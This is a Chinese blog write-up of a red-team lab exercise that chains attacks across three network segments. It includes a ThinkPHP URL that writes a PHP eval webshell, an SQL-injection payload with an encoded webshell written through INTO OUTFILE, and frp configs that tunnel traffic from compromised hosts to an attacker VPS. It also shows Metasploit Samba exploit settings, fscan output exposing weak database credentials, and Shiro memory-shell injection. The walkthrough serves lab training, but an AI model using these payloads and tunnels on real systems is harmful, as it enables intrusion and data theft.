红队从0到1靶场复现

靶场地址:
http://124.223.73.175:8080/public/

1.png

一、外网打点

一看thinkphp首先判断版本,url后随便输入字符
2.png

直接上工具ThinkphpGUI-1.2-SNAPSHOT.jar
3.png

Godzilla连接getshell
4.png

注意:用工具getshell并不能判断是什么码,之后一直连不上了!这里重新手工利用
网上搜索thinkphp5.1.30漏洞,发现利用方式

5.png

直接写入一句话至aa.php

http://124.223.73.175:8080/public/?s=index/\think\template\driver\file/write&cacheFile=aa.php&content=<?php @eval($_POST['a']);?>
6.png

重新用Godzilla连接getshell
7.png

收集服务器信息,发现服务器内网段172.21.110.66
8.png

上传fscan扫描内网存活主机,上传后增加执行权限,noping参数跳过存活检测(实战中两种方式都需尝试)

chmod +x fscan_amd64
./fscan_amd64 -h 172.21.110.66/24
./fscan_amd64 -h 172.21.110.66/24 -np

扫描结果得到result.txt,发现Shiro
9.png

http://172.21.110.76:8080/login;jsessionid=4158AD1AABA3115453EA3A3157AEF1DE
明显是内网网址,访问不了,需要内网穿透
内网网段:192.168.x.x、172.16-31.x.x、10.x.x.x

二、内网穿透

curl vps成功,说明目标主机出网,通过反向代理工具frp进行内网穿透,上传frp服务端至vps上,frps.ini配置如下

[common]
# frp监听的端口,默认是7000,可以改成其他的
bind_port = 10000
# 授权码,请改成更复杂的
auth_token = 12345  # 这个token之后在客户端会用到

# frp管理后台端口,请按自己需求更改
dashboard_addr = 0.0.0.0
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = admin

[web]
type=http
custom_domains = 119.3.31.102
auth_token = 12345

vps启动frps

./frps -c frps.ini
10.png

注意:由于vps是云服务器,默认安全组策略没有放开,所以一直无法访问frp管理后台

http://119.3.31.102:7500/

打开vps安全组策略,即可访问
11.png
12.png

在vps上配置好服务端后,上传frp客户端至靶机1(内网ip:172.21.110.66),frpc.ini配置如下

[common]
server_addr = 119.3.31.102
server_port = 10000
auth_token = 12345
tls_enable = true

[plugin_socks5]
type = tcp
remote_port = 23000
plugin = socks5
custom_domains = 119.3.31.102
use_encryption = true
use_compression = true
13.png

后台启动frp客户端,避免Godzilla断开后代理失效

nohup ./frpc -c frpc.ini >/dev/null 2>&1 &
14.png

使用Proxifier创建代理隧道,完成反向代理
15.png
16.png

代理完成,可以访问
http://172.21.110.76:8080/login;jsessionid=4158AD1AABA3115453EA3A3157AEF1DE

17.png

通过之前fscan扫描得出的result.txt知道是Shiro反序列化,上工具
18.png

利用成功可以命令执行
19.png

注入哥斯拉内存马
20.png
21.png

双网卡机器,发现内网ip:10.10.32.24
22.png

三、横向移动

重复刚才步骤,上传fscan
23.png

上传后增加执行权限,扫描存活主机

chmod +x fscan_amd64
./fscan_amd64 -h 10.10.32.24/24
./fscan_amd64 -h 10.10.32.24/24 -np

扫描结果得到result.txt,发现

10.10.32.51:445 open
10.10.32.51:139 open
10.10.32.82:80 open
10.10.32.82:22 open
10.10.32.1:22 open
10.10.32.82:3306 open
10.10.32.1:8080 open
10.10.32.24:8080 open
10.10.32.82:6379 open
[*] WebTitle:http://10.10.32.24:8080   code:302 len:0      title:None
[*] WebTitle:http://10.10.32.1:8080    code:200 len:10     title:Index of /
[+] mysql:10.10.32.82:3306:root 123456
[*] WebTitle:http://10.10.32.24:8080/login;jsessionid=F0D2A95457555F766E56806174A690FD code:200 len:10     title:Login Page
[*] WebTitle:http://10.10.32.82        code:200 len:137    title:企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站模板
[+] InfoScan:http://10.10.32.24:8080/login;jsessionid=F0D2A95457555F766E56806174A690FD [Shiro] 
[*] 10.10.32.51  (Windows 6.1)
24.png

此时无法访问10.10.32.*段,需测试靶机2(内网ip:10.10.32.24)能否出网,出网才可使用frp

curl 119.3.31.102

上传frpc,增加执行权限,frpc.ini配置如下

[common]
server_addr = 119.3.31.102
server_port = 10000
auth_token = 12345
tls_enable = true

[plugin_socks6]
type = tcp
remote_port = 23001
plugin = socks5
custom_domains = 119.3.31.102
use_encryption = true
use_compression = true

后台启动frp客户端

nohup ./frpc -c frpc.ini >/dev/null 2>&1 &

配置Proxifier
25.png
26.png

1.使用超级弱口令检查工具检测SMB

10.10.32.51:445 open
27.png

本机Kali挂10.10段frp代理,kali代理配置如下vim /etc/proxychains4.conf

[ProxyList]
socks5 119.3.31.102 23001

使用smbclient连接apt-get install smbclient

proxychains smbclient -L 10.10.32.51 -U guest
28.png
29.png

Samba版本为4.6.3,查找对应版本漏洞,参考链接:
30.png

kali代理启动msf

proxychains4 msfconsole
msf6 > use exploit/linux/samba/is_known_pipename
msf6 exploit(linux/samba/is_known_pipename) > show options
msf6 exploit(linux/samba/is_known_pipename) > set rhosts 10.10.32.51
msf6 exploit(linux/samba/is_known_pipename) > exploit

出现报错

[-] 10.10.32.51:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.

百度参考:
31.png
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1

输入以上两条命令,然后exploit,即可执行任意命令
32.png

查看myshare目录的文件proxychains smbclient //10.10.32.51/myshare -U guest

33.png

2.访问http://10.10.32.82/

34.png

百度beescms存在什么漏洞,参考链接如下
35.png

3.使用Navicat Premium连接数据库

mysql:10.10.32.82:3306:root 123456
36.png

管理员密码:21232f297a57a5a743894a0e4a801fc3,MD5解密后密码为admin
37.png
38.png

访问管理员后台地址:
http://10.10.32.82/admin
账号密码为:admin/admin

39.png

用户名处存在sql注入:payload:admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile '/var/www/html/a.php'#
40.png

写入之后访问

http://10.10.32.82/a.php
41.png

蚁剑连接getshell
42.png

双网卡机器,发现内网ip:192.168.38.159
43.png

上传shell.php,用Godzilla连接后上传fscan

./fscan_amd64 -h 192.168.38.159/24

得到result.txt

192.168.38.159:3306 open
192.168.38.182:80 open
192.168.38.159:80 open
192.168.38.1:8080 open
192.168.38.1:22 open
192.168.38.159:22 open
192.168.38.159:6379 open
192.168.38.59:6379 open
[+] mysql:192.168.38.159:3306:root 123456
[*] WebTitle:http://192.168.38.1:8080  code:200 len:10     title:Index of /
[+] Redis:192.168.38.59:6379 unauthorized
[*] WebTitle:http://192.168.38.159     code:200 len:137    title:企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站模板
[*] WebTitle:http://192.168.38.182     code:200 len:12     title:我的网站

此时无法访问192.168.38.*段,将靶机3(内网ip:192.168.38.159)利用frp反向代理,上传frpc,增加执行权限,frpc.ini配置如下

[common]
server_addr = 119.3.31.102
server_port = 10000
auth_token = 12345
tls_enable = true

[plugin_socks7]
type = tcp
remote_port = 23002
plugin = socks5
custom_domains = 119.3.31.102
use_encryption = true
use_compression = true

后台启动frp客户端

nohup ./frpc -c frpc.ini >/dev/null 2>&1 &

配置Proxifier(不再赘述)

4.使用Redis Desktop Manager连接Redis数据库

Redis:192.168.38.59:6379 unauthorized
44.png
45.png

发现redis版本为4.0.14,参考链接:
46.png

5.访问http://192.168.38.182/

47.png

访问织梦管理后台http://192.168.38.182//dede
存在弱口令:admin/admin

48.png
49.png
50.png

四、图示总结
51.png

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 219,635评论 6 508
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,628评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 165,971评论 0 356
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,986评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,006评论 6 394
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,784评论 1 307
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,475评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,364评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,860评论 1 317
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,008评论 3 338
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,152评论 1 351
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,829评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,490评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,035评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,156评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,428评论 3 373
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,127评论 2 356

推荐阅读更多精彩内容